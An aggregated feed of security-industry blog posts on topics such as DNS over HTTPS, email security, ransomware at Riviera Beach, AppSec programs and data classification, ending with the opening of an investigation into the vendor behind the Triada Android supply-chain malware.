The app will focus on protecting users when they use crypto apps or exchanges to transfer cryptocurrency. 

After its initial release, Cloudbric has plans to add upgraded features and functions

Please look forward to more details soon as we disrupt the crypto security market!

—-

Cloudbric is already working to provide web security services to numerous cryptocurrency exchanges and blockchain projects. Known for our distinguished WAF, Cloudbric also recently released Threat DB, our free database of threat intelligence, this past May. The platform currently includes blacklisted, or malicious IPs, known hacker wallet addresses, and phishing URLs.

The data collected on the platform will be available via an API which allows businesses and developers to create their own security technologies. 

Crypto exchanges can also can leverage the hacker wallet addresses to prevent unauthorized transactions on their platform. 


Make sure to follow us on our social media platforms (LinkedInTwitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Klaytn Will Onboard Cloudbric Following Mainnet Launch appeared first on Cloudbric.

How to verify and claim your CLBK token bonuses

Hello Cloudbric CLB community,

The following guide is meant to help you claim your additional CLBK bonuses that you acquired during our Super Holders Event.

Klaytn’s wallet app is expected to be released in late August/early September following the launch of Klaytn’s main net (opened June 27) and will be available to all users. The Klaytn Wallet allows you to check the balance of KLAY and KLAY compatible tokens like CLBK.

Thus, prior to the wallet’s release, Cloudbric will distribute CLBK through Cloudbric Labs, our online hub of free web security resources and tools for the cybersecurity community but in time for our upcoming token swap with Klaytn. 


Step 1: Sign up for membership on Cloudbric Labs using the same email you used to participate in the Super Holder Event

Check for your email here.
     

Step 2: Go to your dashboard and check the quantity of your CLBK tokens. 

Those who participated in the event using multiple wallet addresses but used the same email will be able to see their accumulated CLBK. 

Dashboard

Step 3: Following the release of Klaytn’s wallet, you will be able to enter a Klaytn’s wallet address into Cloudbric Labs’s withdrawal feature to claim your CLBK. 

More details about the token swap will soon be announced!


Make sure to follow us on our social media platforms (LinkedInTwitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post How to verify and claim your CLBK token bonuses appeared first on Cloudbric.

Three Network Security Questions with CEITEC’s CIO

Ireneo Demanarig is the Chief Information Officer at CEITEC S.A. located in Porto Alegre, Rio Grande do Sul, Brazil. CEITEC is a microelectronics manufacturer that specializes in solutions such as automatic identification (RFID and smartcards), application-specific integrated circuits (ASICs) aimed at identifying animals, and much more.

Recently, I jumped on the phone with Ireneo and asked him three questions about his deployment of Trend Micro Network Defense products. And here is what he had to say.

Can you briefly describe your network protection?

We are using a Palo Alto Networks Next Gen Firewall and an F5 DNS at the perimeter with a TippingPoint IPS sitting in-line behind both of them. Off our core switch we are running Deep Discovery Inspector to protect us from advanced threats.  Some people consider using a Next Gen Firewall along with an IPS is redundant but that is not the case. They both protect my network in different ways.  The firewall protects my applications while my IPS helps keep the threats at bay.  A great example was WannaCry.  My next gen firewall missed it but my IPS was able to block every attempt.  I also know that if threats get past both of them I can rely on Deep Discovery Inspector to detect the threat as it moves in, out or across my network.

Toward the end of 2018 Trend Micro released Deep Discovery Network Analytics add-on module, which will correlate Deep Discovery Inspector events and display the entire attack lifecycle graphically for quicker response to threats.  CEITEC was one of the first customers to do a proof of concept on the new module.   

When you did the proof of concept with Deep Discovery Network Analytics what were you able to see?

The proof of concept was a real eye opener for us.  Deep Discovery Inspector generates a lot of events and we have a limited staff.  So we can only focus on the highest level detections.  We don’t have time to look at all events, much less try to connect the dots between multiple events.  The Deep Discovery Network Analytics showed us a number of detected attacks that were buried in the events.  Specifically it found a coin miner that had been hiding in our network.  Network Analytics showed us all the users that were being used in this attack and where they were calling out to.  Correlating all this info would have taken my team 3-4 months.

After purchasing Deep Discovery Network Analytics how long did it take to start seeing the value?

It was immediate.  We looked at our correlated events in the management console and could see quickly that we had a major breach impacting a large number of our users and servers.  Network Analytics showed us on a single chart where the breach started, how it spread, and all the users impacted.  With one click of a mouse we were able to see hundreds of Deep Discovery Inspector events pulled into a single graph.  This helped us understand not only the threat, but also how to respond appropriately to the attack.

Find out why CEITEC relies on Trend Micro to not only protect his network but also provide visibility and automation.

See the customer use case.

For more information on Deep Discovery Network Analytics checkout the data sheet or watch the video.

The post Three Network Security Questions with CEITEC’s CIO appeared first on .

Google Public DNS over HTTPS (DoH) supports RFC 8484 standard



Ever since we launched Google Public DNS in 2009, our priority has been the security of DNS resolution. In 2016, we launched a unique and innovative experimental service -- DNS over HTTPS, now known as DoH. Today we are announcing general availability for our standard DoH service. Now our users can resolve DNS using DoH at the dns.google domain with the same anycast addresses (like 8.8.8.8) as regular DNS service, with lower latency from our edge PoPs throughout the world.

General availability of DoH includes full RFC 8484 support at a new URL path, and continued support for the JSON API launched in 2016. The new endpoints are:

  • https://dns.google/dns-query (RFC 8484 – GET and POST)
  • https://dns.google/resolve (JSON API – GET)
We are deprecating internet-draft DoH support on the /experimental URL path and DoH service from dns.google.com, and will turn down support for them in a few months.

With Google Public DNS, we’re committed to providing fast, private, and secure DNS resolution through both DoH and DNS over TLS (DoT). We plan to support the JSON API until there is a comparable standard for webapp-friendly DoH.


What the new DoH service means for developers

To use our DoH service, developers should configure their applications to use the new DoH endpoints and properly handle HTTP 4xx error and 3xx redirection status codes.
  • Applications should use dns.google instead of dns.google.com. Applications can query dns.google at well-known Google Public DNS addresses, without needing an extra DNS lookup.
  • Developers using the older /experimental internet-draft DoH API need to switch to the new /dns-query URL path and confirm full RFC 8484 compliance. The older API accepts queries using features from early drafts of the DoH standard that are rejected by the new API.
  • Developers using the JSON API can use two new GET parameters that can be used for DNS/DoH proxies or DNSSEC-aware applications.
Redirection of /experimental and dns.google.com

The /experimental API will be turned down in 30 days and HTTP requests for it will get an HTTP redirect to an equivalent https://dns.google/dns-query URI. Developers should make sure DoH applications handle HTTP redirects by retrying at the URI specified in the Location header.

Turning down the dns.google.com domain will take place in three stages.
  1. The first stage (in 45 days) will update the dns.google.com domain name to return 8.8.8.8 and other Google Public DNS anycast addresses, but continue to return DNS responses to queries sent to former addresses of dns.google.com. This will provide a transparent transition for most clients.
  2. The second stage (in 90 days) will return HTTP redirects to dns.google for queries sent to former addresses of dns.google.com.
  3. The final stage (in 12 months) will send HTTP redirects to dns.google for any queries sent to the anycast addresses using the dns.google.com domain.
We will post timelines for redirections on the public‑dns‑announce forum and on the DoH migration page. You can find further technical details in our DoH documentation, and if you have a question or problem with our DoH service, you can create an issue on our tracker or ask on our discussion group. As always, please provide as much information as possible to help us investigate the problem!

How McAfee’s Paternity Leave Helped My New Family

By: Guillaume, EMEA Retail Marketing Manager, Slough, U.K.

Becoming a parent is a daunting experience for anyone. The sheer amount of responsibilities can feel overwhelming and all consuming. For my husband and I, we spent an emotional and tiring 18 months working through the adoption process before becoming parents to two fully formed little humans seemingly overnight. Most parents get to know their children over a few years; we only had two weeks’ worth of introduction. In an instant, these two children and their care, happiness, security, dreams and hopes now rest firmly with us.

I feel incredibly grateful to work for a company that understands the value of family. Whether it was my colleagues checking in and celebrating our new arrivals, or the eight weeks of bonding leave that McAfee offers any new parent – including adoptive and same-sex couples. The paternity leave from McAfee really made a difference in getting to know our children and for them to get to know us. I can’t fathom how different the experience and early months would have been if I had to go back to work after two weeks. The extra time allowed us to get settled and establish good routines.

Overcoming Obstacles

That’s not to say the adoption process was easy. My husband and I knew we wanted to adopt in 2014 but didn’t officially start the process until 2017. After a grueling amount of paperwork came the emotional and time-consuming interview with the social worker. The questions challenged me and forced me to confront some of my own anxieties to ready myself for parenthood. We learned how important it is to be ready and open to re-shape who you are to bring forward the best version of yourself for your children.

 And as a natural worrier, you can imagine how after having children, my anxieties skyrocketed — in addition to the concerns of any new parent, we have to think about protecting our children from homophobic attacks and prejudices. Our boys already had a tough start; I don’t want to make it tougher.

As an LGBTQ+ family, we get unspoken scrutiny from the world that already puts more pressure on us than on conventional families. We know how society says an LGBTQ+ family should celebrate Mother’s Day or Father’s Day. We notice the side looks from other parents. We know how we must conduct ourselves in public to be safe. We know we can’t go on holiday in certain countries.

As a gay man, I’ve had to work hard to create the family I have today. Growing up, gay marriage and adoption weren’t allowed, so I had come to terms with possibly never having a family of my own. Now, I’m able to play football in the park with my kids, tuck them into bed, or help with their homework – just like any other parent. This makes me feel that together, we can make a difference. We can advance equality and make the impossible, possible.

Feeling Included and Supported

I’ve worked for a number of technology companies, but McAfee is the first one that I can say, hand on heart, delivers on its commitment to inclusion. Upon my return, my colleagues have been great at giving me advice and asking how I‘m doing. As an employee and a new father, I couldn’t feel more supported. It’s reassuring to have your company’s backing and I feel lucky to live in an era and country where I could get married and adopt children without discrimination or prejudice.

Allies Can Make a Difference

For me, it’s often the little things that make a big difference toward inclusion and acceptance. Three things I always encourage from allies to help us in our quest for equality, include:

  • Treat people with respect and as your equal (the golden rule – it’s simple and effective!)
  • Have an open mind and don’t be afraid of our differences – we have more in common than you think
  • Call out offensive or disrespectful talk – a simple “hey, that’s not cool” shows those ‘off the cuff’ comments aren’t tolerated

My family is no less different from any other. The worries and hopes for my children are the same as any parent. My struggles and questioning are the same as any father. And the love I feel for my children is the same as everybody else.

Interested in joining our team? We’re hiring! Apply now.

For more stories like this, follow @LifeAtMcAfee on Instagram and on Twitter @McAfee to see what working at McAfee is all about.

The post How McAfee’s Paternity Leave Helped My New Family appeared first on McAfee Blogs.

New Software Security Framework Programs: Timeline & Key Milestones



PCI SSC has announced the rollout of the Secure Software Lifecycle (Secure SLC) and Secure Software Programs. These new validation programs are intended for use by payment software vendors to demonstrate that both their development practices and their payment software products address overall software security resiliency to protect payment data.

Email technology and its security in nutshell

Estimated reading time: 5 minutes

Email has become a necessity of day-to-day communication. We can realize the importance of email with the fact that the down-time of organization email server directly affects the organization’s productivity. Email has become most prominent and integral part of network system, hence one must know how to manage it and keep it secure. Let’s understand the email technology and its basic flow in nutshell.

1.1 How email works

                                             1.1 Diagram to illustrate basic email flow

 

MUA, also referred to as an email client, is a computer application that allows you to compose and send emails or fetch and read emails intended for you. MUA can be a web-based client which means that you can send and receive  emails  via  browser   (i.e. Gmail, Yahoo on Firefox, Chrome etc.) or it can be application- based client (i.e. Thunderbird, Outlook etc.). In order to send an email, the sender needs to compose an email, add recipient name, and click on Send button.

 

Once sender has composed an email and sent it, an email server is ready to receive and process it. Email server is a computer application that is listening on port 25 (Non-encrypted), 465(SSL/TLS), 587(STARTTLS). The email server receives email from the sender and forwards it for delivery. All outgoing emails are placed in a mail queue and in parallel the SMTP server does a query with the DNS server for its MX record in order to find out where the receiver’s email server is located. Once it finds the IP address of recipient email server, it will send the composed message to that IP. E.g. MX record for xyz.com is like mail1.xyz.com.

In an email queue, SMTP server will lookout for MX record and recipient validation. If server is not able to process that email it will place that email in deferred queue which is not going to deliver immediately and re-tries after some time for a few attempts before sending the failed acknowledgment to client. If it is validated and intended for local delivery, it will handover that email to local delivery agent or if it is intended for remote delivery it contacts other mail servers for relaying.

 

If that email is intended for remote delivery, it will relay that email to MTA. MTA is a software application that relays email from one node to another node using SMTP protocol. MTA receives the email from another MTA or a MUA. After receiving that email, it will add the “received” tag at the top of message header file and relay it to another MTA for further delivery. It is also known as relaying agent of email. For each mail, MTA processes it and keeps track of each and every activity and analyzes the list of recipients for the routing actions. It sends responses of non-delivery when a message does not reach its intended destination. A few open source MTAs are Exim, Postfix etc.

 

MDA is a software application that takes mail from MTA and is responsible for delivery of that email to the receiver’s mailbox. Upon final delivery, the Return- Path field is added to the envelope to keep record of return path. Some popular open source MDAs are Dovecot, Fetchmail etc.

 

MUA is a software application that fetches the email from POP3 server or IMAP server and loads that email from the user’s mail box to email client (i.e. Thunderbird, Outlook).

POP3 server listens on following ports:

  • Port 110 – Post Office Protocol for non-encrypted mail.
  • Port 995 – Post Office Protocol over SSL/TLS.

IMAP server listens on following ports:

  • Port 143 – Internet Message Access Protocol for non-encrypted mail.
  • Port 993 – Internet Message Access Protocol over SSL/TLS.

In nutshell,  The Mail Transport Agent (MTA), such as Postfix, Exim is responsible for sending email to the correct destination and handing over the mail to MDA.

The Mail Delivery Agent (MDA) such as Dovecot, Fetchmail receives mail from MTA and sends it into user’s mailbox.(Dovecot supports POP3 and IMAP protocols along with MDA functionality.)

The Mail User Agent (MUA) such as Thunderbird, Outlook is the email client that fetches the email from the user’s mailboxes and presents it to the user.

 

1.2 Security/Protection of Email server:

1.2.1 Scanning from threats

Scanning of emails before they reach the organization’s email server makes organization secure from the malicious activity. Proper scanning for Viruses, Spam, Spy-ware, Trojan horses, Phishing, Worms, Ransomware must be carried out. Email security/protection devices provide the facility to scan email file from the above threats.

1.2.2 Blacklisting of domain/email address

Blacklisting of email domains/ email addresses helps organization prevent receiving email from these malicious addresses or domain names.

1.2.3 Data leak prevention (DLP)

DLP helps organization prevent the leakage of sensitive or confidential information. Security devices check as per administrator’s customized policies at the gateway and accept or reject mail accordingly. Notifying such an activity to administrators would be an added advantage.

1.2.4 Content based blocking

Sometimes inappropriate content may flow through emails. Applying policies for inbound and outbound mail for file types, extension matching, keyword matching, and expression matching in both email body and email attachments reduces the flow of such an information.

1.2.5 Encrypted communication over SSL/TLS

Transport layer security (TLS) for encrypting/decryption can be provided for an email. Sending email in plain text can be intercepted and read by interceptor.

1.2.6 Verification of sender

To maintain the integrity in email communication, the sender should be a verified/legitimate entity. Pretty good privacy (PGP) let you digitally sign an encrypted document. This ensures that email coming to mailbox is not compromised.

Last but not the least, employee training also helps to reduce threats coming to or from the organization. A few points can be included in training.

  •  Never open the links from unknown senders and report to your manager/admin.
  • Do not open attachment if it is from unknown sender and report to manager/admin. If mail is from a known sender but looking suspicious, it is good to confirm before opening the mail.
  • Avoid connecting and accessing your email from public non-secure Wi-Fi connections.

The post Email technology and its security in nutshell appeared first on Seqrite Blog.

Data security and the legal sector – ISO 27001 for law firms

With the legal sector reporting an increase in targeted attacks in 2018, information security management remains a serious issue for law firms. The confidential information and large volumes of client funds they hold are highly desirable to cyber criminals, so it’s not surprising that 60% of law firms reported that they suffered a security incident last year (PwC Law Firms’ Survey 2018).

With increased levels of cyber attacks, information security must be a priority. While a cyber criminal or terrorist organisation may be held off by firewalls and intrusion detection systems, these systems cannot manage the intricacies of business relationships or global trade. As such, a security regime focused solely on technology will fail.

Tackle cyber threats head on with ISO 27001

Leading law firms are implementing ISO/IEC 27001:2013 (ISO 27001), the international standard for information security, to tackle cyber threats head on. Management teams can safeguard their firm by employing a best-practice ISMS (information security management system) and certifying to ISO 27001.

ISO 27001 certification is increasingly demanded of law firms when tendering for major projects. Achieving accredited certification to ISO 27001 will put law firms in the running for these tenders and demonstrates that they are committed to protecting their clients’ confidential data, offering a powerful, visible assurance of their commitment to meeting obligations to clients and business partners.

In addition to severe fines, cyber security and data protection failures also risk seriously damaging a firm’s reputation. Having the correct measures in place will protect a firm’s credibility, minimise risk and maintain the level of trust that clients deserve.

Support with your ISO 27001 project

Whether you are just getting started, preparing a business case for ISO 27001, or your project is already underway, we encourage you to read our new green paper ISO 27001 for Law Firms. It outlines the benefits of ISO 27001 and stresses the importance of stringent data security in the legal sector.

For further support with your firm’s ISO 27001 project, complete an enquiry form to contact our experts or call our team on +44 (0)333 800 7000 to discuss your firm’s requirements.

The post Data security and the legal sector – ISO 27001 for law firms appeared first on IT Governance Blog.

Catch a Ride Via Wearable

More often than not, commuters and travelers alike want to get to their destination quickly and easily. The advent of wearable payments helps make this a reality, as passengers don’t have to pull out a wallet or phone to pay for entry. Adding to that, users are quickly adopting wearable technology that has this payment technology embedded, causing transportation systems to take notice and adopt corresponding technology as a result. Unfortunately, there’s a chance this rapid adoption may catch the eye of cybercriminals as well.

Just last month, the New York City Subway system introduced turnstiles that open with a simple wave of a wearable, like an Apple Watch or Fitbit. Wearables may provide convenience and ease, but they also provide an open door to cybercriminals. With more connections to secure, there are more vectors for vulnerabilities and potential cyberthreats. This is especially the case with wearables, which often don’t have security built-in from the start.

App developers and manufacturers are hard-pressed to keep up with innovation, so security isn’t always top of mind, which puts user data at risk. As one of the most valuable things cybercriminals can get ahold of, the data stored on wearables can be used for a variety of purposes. These threats include phishing, gaining access to online accounts, or transferring money illegally. While the possibility of these threats looms, the adoption of wearables shows no sign of slowing down, with an estimated 1.1 billion in use by 2022. This means developers, manufacturers, and users need to work together in order to keep these handy gadgets secure and cybercriminals out.

Both consumers and transport systems need to be cautious of how wearables can be used to help, or hinder, us in the near future. Rest assured, even if cybercriminals utilize this technology, McAfee’s security strategy will continue to keep pace with the ever-changing threat landscape. In the meantime, consider these tips to stay secure while traveling to your destination:

  • Always keep your software and apps up-to-date.It’s a best practice to update software and apps when prompted to help fix vulnerabilities when they’re found.
  • Add an extra layer of security. Since wearables connect to smartphones, if it becomes infected, there is a good chance the connected smartphone will be impacted as well. Invest in comprehensive mobile security to apply to your mobile devices to stay secure while on-the-go.
  • Clear your data cache. As previously mentioned, wearables hold a lot of data. Be sure to clear your cache every so often to ensure it doesn’t fall into the wrong hands.
  • Avoid storing critical information. Social Security Numbers (SSN), bank account numbers, and addresses do not need to be stored on your wearable. And if you’re making an online purchase, do so on a laptop with a secure connection.
  • Connect to public Wi-Fi with caution. Cybercriminals can use unsecured public Wi-Fi as a foothold into a wearable. If you need to connect to public Wi-Fi, use a virtual private network, or VPN, to stay secure.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post Catch a Ride Via Wearable appeared first on McAfee Blogs.

The $1.5 Million Email

Ransomware has been around since the late 1980s, but in recent years, it has emerged as one of the largest financial threats facing the public and private sector alike. According to the U.S. Department of Homeland Security, ransomware is the fastest-growing malware threat—and according to a report by Recorded Future in May, more than 170 state and local governments have been the victims of ransomware attacks since 2013.

In addition to improved ransomware capabilities, such as military-grade encryption algorithms, two key factors have emboldened cybercriminals to launch such attacks: the rise of hard-to-trace cryptocurrency such as Bitcoin, and the tendency of unprepared targets to continue meeting scammers’ demands, even as these demands become increasingly audacious.

One such target was the city of Riviera Beach, Fla., a waterfront suburb north of Palm Beach, which recently paid a near-record 65 Bitcoins to a gang of hackers after a ransomware attack brought the city to a halt.

On May 29, a city employee opened an email containing a piece of malware, which quickly infected nearly every city computer network. With the municipal computer system held hostage, all operations were hobbled—everything from the city’s website, email server and VoIP phones to the water utility pump stations. 911 dispatchers were forced to take down caller information on paper, employees and vendors had to be paid with paper checks, utility payments could only be accepted by snail mail or in person, and police officers had to resort to digging through closets at headquarters to find paper traffic citation pads.

City leaders were told they could make all of these problems go away—if they simply complied with the ransomers’ demand to remit 65 bitcoin (roughly $600,000) in exchange for the decryption key.

While the city had originally decided not to pay the ransom—opting instead to invest $914,000 into purchasing hundreds of new desktop and laptop computers and other hardware in an attempt to circumvent the issue—these measures ultimately failed. Three weeks after the original attack, based on the advice of an outside security consulting firm, the city council met to discuss next steps—and unanimously decided, after just two minutes of discussion, to acquiesce. The total cost, including the unbudgeted-for hardware, the consultation, and of course, the ransom itself, amounted to more than $1.5 million. For a city of just 35,000 residents, the cost was staggering, even after insurance paid its percentage.

While Riviera Beach was among the latest targets, it certainly won’t be the last, or the largest—according to a 2018 Deloitte-NASCIO survey, nearly half of states lack a separate cybersecurity budget, and a majority allocate under 3% of IT budgets to cyberthreat prevention.

But with ransomware attacks continuing to unleash a post-internet world on any unsuspecting target at any time, many targets are finding that, as much as they thought they lacked the resources to prevent such attacks, they’re even less prepared for the aftermath. Once infected, they’re left with two unsavory options: Pay the ransom, knowing that there’s no guarantee the hackers will decrypt the systems or that they’ll be decrypted perfectly. And even if they are, there are still the moral implications: When governments pay such ransoms, they’re not only putting taxpayer dollars directly into the hands of criminals, they’re also encouraging future ransomware attacks. The alternative, of course, is to try to rebuild…often from the ground up.

While cyberinsurance policies can give the illusion of protection, this solution will likely become less viable as the frequency of attacks continues to rise and the amount demanded continues to skyrocket. The goal, then, becomes for companies, government entities and individuals to prepare for and prevent these attacks before they’re targeted. While large-scale legislative solutions, such as outlawing the payment of ransomware demands, may eventually offer some relief, here are some steps that companies, individuals and government entities can take right now to prevent being victims:

  1. Learn: Resources such as NoMoreRansom.org—an initiative created by the National High Tech Crime Unit of Netherlands, Europol’s European Cybercrime Centre, and McAfee—aim to provide prevention education and help ransomware victims retrieve their encrypted data without having to pay criminals.
  2. Educate: When it comes to ransomware, knowing isn’t half the battle—it’s the entire battle. When millions of dollars hinge on your employees’ decision whether or not to open an email, organization-wide training on how to spot malicious emails and social engineering schemes may pay for itself many, many times over.
  3. Backup: There’s no reason to pay criminals to decrypt your data if you have access to a copy. Frequently back up essential data, ideally storing it both locally and on the cloud.
  4. Update: Always downloading the newest version of your operating system or apps helps you stay ahead of threats
  5. Defend: Sufficiently robust security solutions can protect you from known threats as well as those that have not yet been formally detected.

The post The $1.5 Million Email appeared first on McAfee Blogs.

Key Components to Consider When Kicking Off Your Veracode AppSec Program

I’ve been working as a Veracode security program manager since 2013, and have adopted AppSec best practices in those six years that contribute to successful AppSec programs. I started my journey here as a program manager and was fortunate enough to manage and lead some of Veracode’s largest and most complex customer programs. Today, I’m managing a team of program managers.

In this blog, I will walk through four key components to consider when kicking off your program with Veracode. These are all components I’ve implemented when managing large programs, and which have led to AppSec success by helping organizations understand what’s needed in order to have a successful, well-functioning application security program.  

Customer Engagement

The first component is Veracode customer engagement. You might be thinking, “of course, this is a given,” but in some cases I’ve seen (moreso in the past), it’s not. The No. 1 roadblock with the customers I’ve seen struggle has been lack of engagement. An established security team (on the client side) who can act as the liaison between the development organization and Veracode is very important. In some cases, increasingly so with the DevSecOps push, dev management is involved as well.

When I first began my journey with Veracode, security didn’t exist at many organizations, so an engaged team also didn’t exist. Today, when I go on-site and meet with my customers, I frequently thank them. I thank them for their dedication and engagement level, because without the primary, day-to-day contacts, it would be more difficult to get the necessary traction. At Veracode, we say it’s a team effort. Customers who identify teams who are willing and eager to work with their Veracode contacts is the No. 1 step toward success. This is also a team or individual who can act as a Veracode advocate and work with the Veracode SPM to tackle Veracode initiatives and be an internal presence that helps drive and motivate, making security No. 1 so that our clients’ customers are confident they’re using secure products and applications.

Cross-Functional Communication

My second on the list is cross-functional communication. It is imperative for a program to have cross-functional communication between the security team and main teams involved, including executives and the development organization. Communicating policy mandates, remediation plans, and automation plans across all functions, including developers and DevOps teams, early on in the program, is going to put a program ahead. Understanding what the best communication method is in order to circulate important plans across teams, whether it’s through email or a newsletter, and who should be delivering it, should be well thought out. Veracode Program Management acts as an extension of our customers’ teams and, therefore, can help with messaging and delivery.  

Ultimately, communication will prevent confusion and promote awareness, which is important to the health of a program. When a developer is introduced to security scanning requirements or remediation plans later in the development lifecycle, it can affect release dates. The team will be in a much better position if they know early on what they’re responsible for and when, and any consequences if they do not incorporate security into their SDLC.

Application Inventory

Next is application inventory, which is another major component. This is a list of your organization’s high-risk applications that are most critical to the business and could impact company brand or reputation if breached, OR application inventory could be all applications in the organization. If you do not know this information early on, it could cause delays when kicking off a program.

We recommend companies scan all their applications. However, many organizations start their programs with a baseline of only their high-risk applications. If you fall into this category, having that list ready and sharing it with your Veracode Security Program Manager will keep everyone in alignment. Your SPM will provide a list of the important information needed when gathering application inventory information, and prior to setting up application profiles in the Veracode platform.

Program Strategy

Finally, once you’ve identified your team, have a communication plan in place, and have created an application inventory, the next step is to map out program strategy. This is where your Veracode SPM will have a discovery session with you and your team to discuss the future of the program, and obtain key information to ensure success. He or she will also review the critical activities that need to take place in the security program to keep it on track. Additionally, the SPM will review measureable metrics with you and discuss what the key metrics are to the organization/teams in order to track program success down the road. The SPM will handle the operational effort to get you there and report back regularly to ensure that you are achieving your organizational goals through those metrics.

The SPM will ask several questions to help develop and kick off your program, including:

  • Details about your SDLC environment, development tools, and systems the development teams are using. This is imperative as the push to shift left and toward DevSecOps is a major focus for many organizations today. The end goal is to fully automate your application security program, because automating and integrating security into your CI/CD pipeline will make for a seamless program that will save you and your developers time and money.
  • Identifying development teams and setting onboarding schedules. Training users on how to use the Veracode platform will help immensely with developer adoption and awareness. Veracode provides training and always offers flexible schedules to accommodate developers globally.
  • Establishing a remediation process and workflow. The end goal is to bring down those very high and high flaws to get you closer to being compliant with your organization’s policies and standards.

Lastly, we will have discussions around automation and integration into your CI/CD pipeline. As mentioned, this will save time for developers by streamlining the scanning process through automation and having them consume Veracode scan results in their environment, rather than manually running scans and reviewing results in the UI.

Whether you’re an existing customer or potential customer, if all of these items are checked off at the beginning, then you will be on the right path to kick-starting a robust application security program that everyone at your organization will be onboard with.  

Learn More

Get more details on maturing your application security program in our guide, Everything You Need to Know About Maturing Your Application Security Program.

And you can always get valuable tips and advice on managing AppSec from other Veracode customers in our Community.

3 strategies for building an information protection program

Five years ago, we started on a journey to update and simplify information protection at Microsoft. We had a manual data classification process that our users didn’t use effectively and didn’t work with our data storage or database technology. We had to find ways to re-classify data and build effective tools while protecting our most important asset, customer, and employee information.

We’ve learned a lot about data protection and tools and today we’re sharing some of our best practices for:

  • Laying the groundwork for protecting information.
  • Protecting trade secrets.
  • Starting your information protection journey.

Laying the groundwork for protecting information

Identifying the location of data—The first step to creating a strategy is discovering where your data and major storage places are so you can create a data landscape. Do you have data on your endpoints? Start by looking across your organization to identify your customer data, regulatory data, and other sensitive information.

Classifying the data—Classifying data is the most important and most difficult step. At Microsoft, we used a custom three-level manual label classification process but found that no one understood how to apply them correctly. We worked with legal, HR, and other groups to identify labels that made sense for our company with a goal that they could be applied automatically.

Our objective is to ensure that our data and our customer data is handled properly, classified correctly, and is protected. We’re a global company and the General Data Protection Regulation (GDPR) is the baseline—and one of our key tenets—for how we think about our information and how we protect it. We replaced the manual classification labels with a more intuitive labeling taxonomy that better aligns with industry standards:

  • Non-Business: Data that is non-business related and doesn’t belong to Microsoft.
  • Public: Data designed for public consumption.
  • General: Business data not meant for public consumption.
  • Confidential: Sensitive business data that could cause business harm if over-shared.
  • Highly Confidential: Very sensitive business data that would certainly cause the business harm if over-shared.

Identifying and resolving old data—Before you roll out new tools, there may be old data that you need to review and resolve. For example, you may need to clean up, delete, or protect your data. When reviewing data, consider the age of the data and if anyone is still using a document. Prioritize and create rules for saving, deleting, and protecting data.

Protecting the data—You want to protect the data based on classification. Protecting customer and personal information is at the core of what we’re trying to protect at Microsoft. For smaller companies—or companies just starting to develop an information protection program—your biggest return will be finding customer data so you can protect it. Building customer trust and protecting customer information is key to an information protection program.

Protecting trade secrets

Protecting our identities is an extremely important part of the information protection journey. But what if you come across a document with trade secret information? You should probably work with the group that handles trade secrets at your company. We have a white glove program with HR where we build specific programs for specific business units. Using products like Key Vault can help protect sensitive data.

Starting your information protection journey

If you’re just starting to build an information protection program, we recommend the following three-step process:

  1. Governance, risk, and compliance—Have your legal and HR teams help you define the types of information you need to defend. Always focus on customer data and sensitive information.
  2. Education and awareness—Labels are always important because they’re foundation for identifying the difference between confidential and general business data. Use terminology that’s easy for users to understand. Train them and use tools to implement your solutions. We used education campaigns and we also built tool tips and right management service (RMS) templates into our products. For example, if I’m working in an Office experience, I might get a tool tip prompting me to classify a document as confidential. We found that 50 percent of the time, users will increase the confidentiality of the document.
  3. Tools roll out—When you’re working with tools, remember that you’re typically interacting with customer and employee information. It’s an opportunity to build trust as a company. Some of the information protection tools we use include Office 365 Information Protection and Azure Information Protection, which provides labeling functionality we can push to endpoints, as well as label and tool tips for Office documents. We also use the file share scanner and Windows Information Protection (which is still in pilot phase).

Building an information protection program is not one-size-fits-all, but if you choose classification terms, terms that are easy to understand and implement, proactively educate users, and bake information protection into existing processes to minimize impact, you can increase the success of the program.

For more information about how Microsoft has implemented these strategies, watch the IT Showcase webinar, Speaking of security: Information protection.

The post 3 strategies for building an information protection program appeared first on Microsoft Security.

Tracing the Supply Chain Attack on Android

Earlier this month, Google disclosed that a supply chain attack by one of its vendors resulted in malicious software being pre-installed on millions of new budget Android devices. Google didn’t exactly name those responsible, but said it believes the offending vendor uses the nicknames “Yehuo” or “Blazefire.” What follows is a deep dive into the identity of that Chinese vendor, which appears to have a long and storied history of pushing the envelope on mobile malware.

“Yehuo” () is Mandarin for “wildfire,” so one might be forgiven for concluding that Google was perhaps using another dictionary than most Mandarin speakers. But Google was probably just being coy: The vendor in question appears to have used both “blazefire” and “wildfire” in two of many corporate names adopted for the same entity.

An online search for the term “yehuo” reveals an account on the Chinese Software Developer Network which uses that same nickname and references the domain blazefire[.]com. More searching points to a Yehuo user on gamerbbs[.]cn who advertises a mobile game called “Xiaojun Junji,” and says the game is available at blazefire[.]com.

Research on blazefire[.]com via Domaintools.com shows the domain was assigned in 2015 to a company called “Shanghai Blazefire Network Technology Co. Ltd.” just a short time after it was registered by someone using the email address “tosaka1027@gmail.com“.

The Shanghai Blazefire Network is part of a group of similarly-named Chinese entities in the “mobile phone pre-installation business and in marketing for advertisers’ products to install services through mobile phone installed software.”

“At present, pre-installed partners cover the entire mobile phone industry chain, including mobile phone chip manufacturers, mobile phone design companies, mobile phone brand manufacturers, mobile phone agents, mobile terminal stores and major e-commerce platforms,” reads a descriptive blurb about the company.

A historic records search at Domaintools on that tosaka1027@gmail.com address says it was used to register 24 Internet domain names, including at least seven that have been conclusively tied to the spread of powerful Android mobile malware.

Two of those domains registered to tosaka1027@gmail.com — elsyzsmc[.]com and rurimeter[.]com — were implicated in propagating the Triada malware. Triada is the very same malicious software Google said was found pre-installed on many of its devices and being used to install spam apps that display ads.

In July 2017, Russian antivirus vendor Dr.Web published research showing that Triada had been installed by default on at least four low-cost Android models. In 2018, Dr.Web expanded its research when it discovered the Triada malware installed on 40 different models of Android devices.

At least another five of the domains registered to tosaka1027@gmail.com — 99youx[.]com, buydudu[.]com, kelisrim[.]com, opnixi[.]com and sonyba[.]comwere seen as early as 2016 as distribution points for the Hummer Trojan, a potent strain of Android malware often bundled with games that completely compromises the infected device.

A records search at Domaintools for “Shanghai Blazefire Network Technology Co” returns 11 domains, including blazefire[.]net, which is registered to a yehuo@blazefire.net. For the remainder of this post, we’ll focus on the bolded domain names below:

Domain Name      Create Date   Registrar
2333youxi[.]com 2016-02-18 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
